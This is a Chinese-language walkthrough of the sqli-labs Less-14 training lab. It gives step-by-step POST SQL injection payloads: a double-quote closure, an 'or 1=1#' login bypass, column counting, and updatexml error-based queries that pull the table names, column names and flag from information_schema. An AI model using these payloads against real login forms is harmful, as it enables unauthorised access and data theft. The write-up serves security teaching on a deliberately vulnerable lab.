标签：14 Less passwd 0x7e #& submit uname Submit

Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

 1.判断是否存在注入

uname=1"&passwd=a&submit=Submit

错误回显 => 存在注入

2.判断参数类型

uname=1 or 1=1#&passwd=a&submit=Submit

无回显

uname=1" or 1=1#&passwd=a&submit=Submit

登录成功 =>字符型

3.进行参数闭合

uname=1" or 1=1#&passwd=a&submit=Submit

登录成功 => 闭合成功

4.查看这个网站后台数据库所在的表有几列

uname=1" order by 2#&passwd=a&submit=Submit

无回显

uname=1" order by 3#&passwd=a&submit=Submit

错误回显 => 有2列

5.进行报错注入，查看所在数据库

uname=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#&passwd=a&submit=Submit

6.查看数据库的表

uname=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#&passwd=a&submit=Submit

7.查看r1lPpzMz表中的列

uname=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="r1lPpzMz"),0x7e),1)#&passwd=a&submit=Submit

8.查看表中的flag列中的数据

uname=1" and updatexml(1,concat(0x7e,(select flag from r1lPpzMz limit 0,1),0x7e),1)#&passwd=a&submit=Submit

标签：14,Less,passwd,0x7e,#&,submit,uname,Submit
来源： https://www.cnblogs.com/WHOAMI-xiaoyu/p/16057671.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。